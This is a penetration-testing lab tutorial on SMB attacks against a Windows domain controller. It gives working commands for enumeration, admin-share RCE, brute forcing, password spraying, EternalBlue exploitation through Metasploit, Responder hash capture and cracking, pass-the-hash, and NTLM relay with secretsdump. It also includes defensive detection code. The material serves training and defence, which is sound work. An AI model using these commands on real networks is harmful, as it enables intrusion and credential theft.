SMB Common Attacks
Sections
SMB Intro
Making the Lab vulnerable
SMB Tools & Guest or Anonymous access to Shares
RCE Via access to Administrative Shares
SMB Brute Forcing
SMB Password Spraying
SMBv1 EternalBlue (CVE-2017-0144)
Net-NTLM Capture Attack
Pass the Hash Attack (PTH)
Net-NTLM Relay Attack
Other Resources
SMB Intro
The SMB protocol is a network file sharing protocol that allows applications on a computer to read and write files, and to request services from server programs on the network. If it is not protected well, it is one of the most critical attack vectors in a Windows environment.
SMBv1 is deprecated and has several known vulnerabilities (EternalBlue, abused by WannaCry, etc.).
It can run over multiple ports: TCP 445, and 137-139 (NetBIOS, partly over UDP).
Making the Lab vulnerable
Create a Share
To test it, I created a shared folder called "SharedFiles" containing a text file. The directory is shared with 'devan' with read/write rights (Properties->Share->AddUser: 'devan').

Location: \\CORP-DC\SharedFiles
Then we can access it from Devan's workstation using that path.

Disable SMB Signing
By default, SMB signing is enabled on Domain Controllers.
Method 1: Group Policy (Recommended)
Open Group Policy Editor (gpedit.msc). Navigate to:
Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Disabled:
"Microsoft network server: Digitally sign communications (always)"
"Microsoft network server: Digitally sign communications (if client agrees)"
Restart the server.
Method 2: Registry (Manual)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "EnableSecuritySignature" -Value 0
Restart-Computer -Force
Enable Guest & Anonymous Access
Method 1: Group Policy (Recommended)
Open Group Policy Editor (gpedit.msc). Navigate to:
Computer Configuration → Administrative Templates → Network → Lanman Workstation
Enable "Enable insecure guest logons".
Then, go to:
Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Set the following to Enabled:
"Network access: Let Everyone permissions apply to anonymous users"
"Accounts: Guest account status"
Restart the server.
Method 2: Registry (Manual)
# RestrictAnonymous lives under Control\Lsa, not under LanmanServer\Parameters
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 0
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "AllowInsecureGuestAuth" -Value 1
Restart-Computer -Force
Allow Anonymous Access to a Specific SMB Share
Method 1: Security Policy (secpol.msc)
Open Local Security Policy (secpol.msc). Navigate to:
Security Settings → Local Policies → Security Options
Modify "Network access: Shares that can be accessed anonymously" and add "SharedFiles".
Restart the server.
Method 2: Registry (Manual)
# NullSessionShares is a REG_MULTI_SZ, one share name per entry
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "NullSessionShares" -Type MultiString -Value @("SharedFiles")
Restart-Computer -Force
SMB Tools & Guest or Anonymous access to Shares
SMBMap
We can enumerate SMB shares and access the system using these commands:
smbmap -H corp-dc #List shares reachable with anonymous access
smbmap -H corp-dc -u "devan" -p "P@ssword123!" #List Devan's shares
smbmap -H corp-dc -u "devan" --prompt #List Devan's shares without writing the password in cleartext

List a specific Share
smbmap -H corp-dc -u "devan" --prompt -r "SharedFiles"
Check OS Version and signing status
smbmap -H corp-dc -u "devan" --prompt -v #OS version check
smbmap -H corp-dc -u "devan" --prompt --signing #Signing check

If message signing is disabled, the host can be targeted by relay attacks and, if SMBv1 is still enabled, potentially by the EternalBlue vulnerability.
SMB Client
Similar to SMBMap, we can use it to enumerate shares and interact with a share through a file-system-like prompt.
smbclient -L //corp-dc -N #Anonymous Login (-N no credentials)
smbclient //corp-dc -U "dev-angelist.lab/devan%P@ssword123!" #List Devan's shares
smbclient //corp-dc/SharedFiles -U devan
smbclient //corp-dc/SharedFiles -U "dev-angelist.lab/devan%P@ssword123!" #we can get file shared using get command
#File system prompt includes command such as: cd, dir, ls, get, put

Netexec
It's a fantastic tool that supports the most common protocols.
nxc smb corp-dc #Retrieve info about the DC: SMB version, OS version, domain name and signing status
nxc smb corp-dc -u "" -p "" --users #Try to authenticate using a null session
nxc smb corp-dc -u "AnAccountThatDoesntExist" --shares #Try to authenticate as guest (non-existent account)
nxc smb corp-dc -u "devan" -p "P@ssword123!" --shares #List Devan's shares plus SMB version, OS version, domain name and signing status

RCE Via access to Administrative Shares
If it is possible to access the administrative shares over SMB, it might be possible to obtain Remote Code Execution (RCE):
smbmap -H corp-dc -u "administrator" -x "whoami" --prompt
smbmap -H corp-dc -u "administrator" -x "whoami /priv" --prompt
nxc smb corp-dc -u "administrator" -p 'P@$$W0rd' -x "whoami /priv"

In this case we only executed a whoami command, but the same primitive can be used, for example, to spawn a reverse shell.
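As an added defender-side example (not from the original notes), the same primitive leaves a recognisable trail on the target: the remote account touches IPC$ (the svcctl pipe) or ADMIN$/C$ (Security event 5145) and a new service is installed seconds later (System event 7045). The Python below correlates constructed records of those two events; every name, path and address in it is made up.

```python
from datetime import datetime, timedelta

# Constructed records (not real logs) shaped like Security 5145 "share object access check" and
# System 7045 "service installed". 5145 needs the "Audit Detailed File Share" subcategory enabled.
CONSTRUCTED_EVENTS = [
    {"time": "2024-05-01T10:00:00", "id": 5145, "IpAddress": "192.168.57.7", "SubjectUserName": "administrator",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "svcctl"},            # service control pipe
    {"time": "2024-05-01T10:00:01", "id": 5145, "IpAddress": "192.168.57.7", "SubjectUserName": "administrator",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "__output"},        # command output written to ADMIN$
    {"time": "2024-05-01T10:00:02", "id": 7045, "ServiceName": "constructed-svc",
     "ImagePath": r"%COMSPEC% /Q /c whoami > \\127.0.0.1\ADMIN$\__output"},
    {"time": "2024-05-01T10:20:00", "id": 5145, "IpAddress": "192.168.57.9", "SubjectUserName": "devan",
     "ShareName": r"\\*\SharedFiles", "RelativeTargetName": "notes.txt"},  # normal share use
    {"time": "2024-05-01T12:00:00", "id": 7045, "ServiceName": "VendorHelper",
     "ImagePath": r"C:\Program Files\Vendor\helper.exe"},                  # no remote admin-share access before it
]
ADMIN_SHARES = {"ADMIN$", "C$"}

def is_remote_exec_path(ev):
    """True for a 5145 record that touches an administrative share or the svcctl pipe."""
    share = ev["ShareName"].rsplit("\\", 1)[-1]
    return share in ADMIN_SHARES or (share == "IPC$" and ev["RelativeTargetName"].lower() == "svcctl")

def admin_share_exec_alerts(events, window=timedelta(seconds=30)):
    """Pair each new-service event (7045) with admin-share activity (5145) seen shortly before it."""
    ts = lambda e: datetime.fromisoformat(e["time"])
    events = sorted(events, key=ts)
    alerts = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        prior = [p for p in events if p["id"] == 5145 and is_remote_exec_path(p)
                 and ts(ev) - window <= ts(p) <= ts(ev)]
        if prior:   # a service appeared right after remote admin-share access: classic remote-exec pattern
            alerts.append({"when": ev["time"], "source": prior[0]["IpAddress"], "account": prior[0]["SubjectUserName"],
                           "service": ev["ServiceName"], "image": ev["ImagePath"], "share_hits": len(prior)})
    return alerts

if __name__ == "__main__":
    for alert in admin_share_exec_alerts(CONSTRUCTED_EVENTS):
        print(alert)
```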
SMB Brute Forcing
When we talk about logins, we must also talk about brute force attacks. To perform one we can use tools such as Hydra or Legba (suggested for the SMB protocol, run here with Docker).
docker run --entrypoint "/bin/bash" -v $(pwd)/wordlists:/data --network host -it evilsocket/legba:latest #Get a shell inside the container; ./wordlists is mounted at /data
legba smb --smb-workgroup dev-angelist.lab --smb-share "C$" --username administrator --password /data/passwords.txt --target corp-dc #Brute force the administrator password
legba smb --smb-workgroup dev-angelist.lab --smb-share "SharedFiles" --username devan --password /data/passwords.txt --target corp-dc #Brute force Devan's password
SMB Password Spraying
A password spraying attack involves a threat actor trying a single common password against many accounts on the same application. It works because weak passwords are common and several users often share the same one.
We can perform it with Netexec:
nxc smb corp-dc -u "devan" -p passwords.txt #Basic nxc query against one user - we can use rockyou.txt
nxc smb ip.txt -u users.txt -p passwords.txt --continue-on-success #password spraying on multiple IPs and users
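An added detection example, not part of the original notes: the two attacks above have distinct shapes in Security event 4625 (logon failure) data. Brute force is many failures against one account from one source; spraying is one or two failures against many accounts from one source. The events below are constructed to mimic both shapes plus a user mistyping a password.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# In a real deployment these tuples come from 4625 events (TimeCreated, IpAddress, TargetUserName).
# Here they are constructed to reproduce the two attack shapes and one benign case.
def constructed_events():
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    events = [(t0 + timedelta(seconds=10 * i), "192.168.57.7", "administrator") for i in range(10)]  # one account, many tries
    events += [(t0 + timedelta(seconds=7 * i), "192.168.57.8", f"user{i:02d}") for i in range(8)]   # many accounts, one try each
    events += [(t0, "192.168.57.20", "alice"), (t0 + timedelta(seconds=30), "192.168.57.20", "alice")]  # a user mistyping
    return events

def classify_sources(events, window=timedelta(minutes=5), min_failures=6, spray_accounts=5):
    """Per source IP, find the densest window of failures and label its shape.

    Returns {ip: (verdict, failures_in_window, distinct_accounts_in_window)}.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in sorted(events):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, evs in by_ip.items():
        best_count, best_accounts, start = 0, set(), 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window start forward
                start += 1
            if end - start + 1 > best_count:
                best_count = end - start + 1
                best_accounts = {u for _, u in evs[start:end + 1]}
        if best_count < min_failures:
            verdict = "normal"
        elif len(best_accounts) >= spray_accounts:
            verdict = "password_spray"   # few guesses per account, spread over many accounts
        else:
            verdict = "brute_force"      # many guesses concentrated on one or few accounts
        verdicts[ip] = (verdict, best_count, len(best_accounts))
    return verdicts

if __name__ == "__main__":
    for ip, result in classify_sources(constructed_events()).items():
        print(ip, result)
```

Lockout policies stop the brute-force shape but not the spray shape, which is why the per-source distinct-account count is the signal worth alerting on.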
SMBv1 EternalBlue (CVE-2017-0144)
Windows systems running SMBv1 can be vulnerable to dangerous attacks such as EternalBlue, also known as CVE-2017-0144 or MS17-010.
We can check the SMB version and configuration with the previous tools (smbmap, netexec) or with generic tools such as nmap and the Metasploit Framework:
Nmap
nmap -p445 --script smb-vuln-ms17-010 corp-dc #Enumerate vulnerable configuration
Metasploit
# Scan for the vulnerability
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS corp-dc
run
# Exploit vulnerability
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS corp-dc
run
Other Lab
Net-NTLM Capture Attack
When a Windows client authenticates to an SMB server, it does not send its NT hash directly; it sends a challenge-response (the Net-NTLM hash) computed from that NT hash. Depending on the protocol version, it is computed differently:
Net-NTLMv1:
Uses a simple DES-based scheme keyed with the NT hash.
Net-NTLMv2:
Uses HMAC-MD5 over a combination of server and client challenges for stronger security.
It is possible to capture a user's Net-NTLM hash by forcing the client to authenticate against a fake SMB server.
Common attack vectors are:
Phishing real users
Exploiting a reverse shell
To set up Responder for capturing Net-NTLM hashes:
Install Responder:
python3 -m venv venv
source venv/bin/activate
pip3 install impacket netifaces
git clone https://github.com/lgandx/Responder.git
Start Responder on the victim's network interface (kali):
cd Responder
sudo python3 Responder.py -I eth1

Trigger authentication from the victim machine:
C:\> dir \\192.168.57.7\test
#Access is denied.

This will leak the Net-NTLM hash:
[SMB] NTLMv2-SSP Client : 192.168.57.9
[SMB] NTLMv2-SSP Username : DEV-ANGELIST\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::DEV-ANGELIST:835fd92467bf...
Cracking the captured Net-NTLM hash (tools: JohnTheRipper or Hashcat):
# Net-NTLMv1
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 hash.txt rockyou.txt
# Net-NTLMv2
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 hash.txt rockyou.txt
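As an added worked example (not the author's code), this is the computation behind the Net-NTLMv2 description above and behind hashcat mode 5600: the NT hash, NTOWFv2, and the NTProofStr over server challenge plus client blob, as MS-NLMP specifies. It also shows why a Net-NTLM capture, unlike the NT hash reused in the pass-the-hash section below, is bound to one challenge and only useful for offline guessing or relaying. The sample capture line, its challenges and its blob are constructed, not a real capture; a pure-Python MD4 is included because OpenSSL 3 builds frequently remove md4 from hashlib.

```python
import hashlib, hmac, struct

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often remove md4 from hashlib."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & 0xFFFFFFFF
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = ((F, range(16), (3, 7, 11, 19), 0),
              (G, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
              (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, const in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rol((a + f(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4]), b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """The NT hash Mimikatz dumps from memory: MD4 over the UTF-16LE password. Reusable as-is (pass the hash)."""
    return md4(password.encode("utf-16le"))

def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) || domain); MS-NLMP upper-cases only the user name."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()

def ntproof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, server challenge || blob); the blob carries the client challenge."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()

def verify_ntlmv2(capture: str, password: str) -> bool:
    """What a verifier (or hashcat -m 5600) computes for a Responder line user::domain:challenge:proof:blob."""
    user, _, domain, challenge, proof, blob = capture.split(":")
    expected = ntproof_str(password, user, domain, bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(expected, bytes.fromhex(proof))

# Constructed sample (not a real capture): server challenge and a minimal client blob are made up.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
CLIENT_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00" * 8)
SAMPLE_CAPTURE = "devan::DEV-ANGELIST:%s:%s:%s" % (
    SERVER_CHALLENGE.hex(),
    ntproof_str("Winter2024!", "devan", "DEV-ANGELIST", SERVER_CHALLENGE, CLIENT_BLOB).hex(),
    CLIENT_BLOB.hex())
```

verify_ntlmv2(SAMPLE_CAPTURE, "Winter2024!") returns True and any other guess returns False; the same proof checked against a different SERVER_CHALLENGE also fails, which is why the capture cannot be replayed later.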

Pass the Hash Attack (PTH)
If an attacker obtains an NTLM hash (the NT hash held in memory, which is different from the Net-NTLM challenge-response captured above), it can be used to authenticate as the user without knowing the password.
We can obtain NTLM hashes using tools such as Mimikatz.

Example NTLM Hash:
administrator:f193d757b4d487ab7e5a3743f038f713
Using nxc (NetExec) to authenticate:
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713
nxc smb corp-dc -u administrator -H f193d757b4d487ab7e5a3743f038f713 --shares
nxc smb corp-dc -u administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE -X "whoami"
If the user of the hash is unknown, we can spray it against a list of users:
nxc smb corp-dc -u users.txt -H 2B576ACBE6BCFDA7294D6BD18041B8FE
Net-NTLM Relay Attack
If the captured Net-NTLM hash cannot be cracked, it can be relayed to another system if SMB signing is disabled.
The NTLM relay attack has the following steps:
0) Check if SMB signing is disabled (pre-requisite)
1) Interception of Authentication Attempt
2) Capture of Net-NTLM Challenge-Response
3) Relay to Target SMB
4) Obtain Unauthorized Access
Check SMB signing status:
(on attacker machine)
nxc smb corp-dc #Retrieve info about the DC: SMB version, OS version, domain name and signing status
smbmap -H corp-dc -u "devan" --prompt --signing #Signing check
nmap --script smb2-security-mode.nse -p 445 corp-dc #If the output is "Message signing not required" it's vulnerable
(on target):
Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, RequireSecuritySignature
If signing is enabled, it must be disabled via GPO or PowerShell:
Set-SmbClientConfiguration -RequireSecuritySignature $false
Set-SmbServerConfiguration -RequireSecuritySignature $false
Obtain a list of vulnerable SMB servers:
nxc smb corp-dc --gen-relay-list target_list.txt

192.168.57.9 is the corresponding IP address of corp-dc.
Start the relay server for the Net-NTLM authentication:
sudo ntlmrelayx.py --no-http-server -smb2support -t smb://corp-dc -socks
Trigger authentication from the victim machine:
dir \\192.168.57.7\test #Kali Machine (192.168.57.7)
Setup Proxychains Proxy
echo "socks4 127.0.0.1 1080" | sudo tee -a /etc/proxychains.conf  # the redirection must run as root too, so use tee instead of 'sudo echo >>'
Using the authenticated session via SOCKS proxy:
proxychains lookupsid.py -no-pass -domain-sids domain/user@corp-dc
proxychains secretsdump.py -no-pass domain/user@corp-dc
proxychains smbexec.py -no-pass domain/user@corp-dc
Other Resources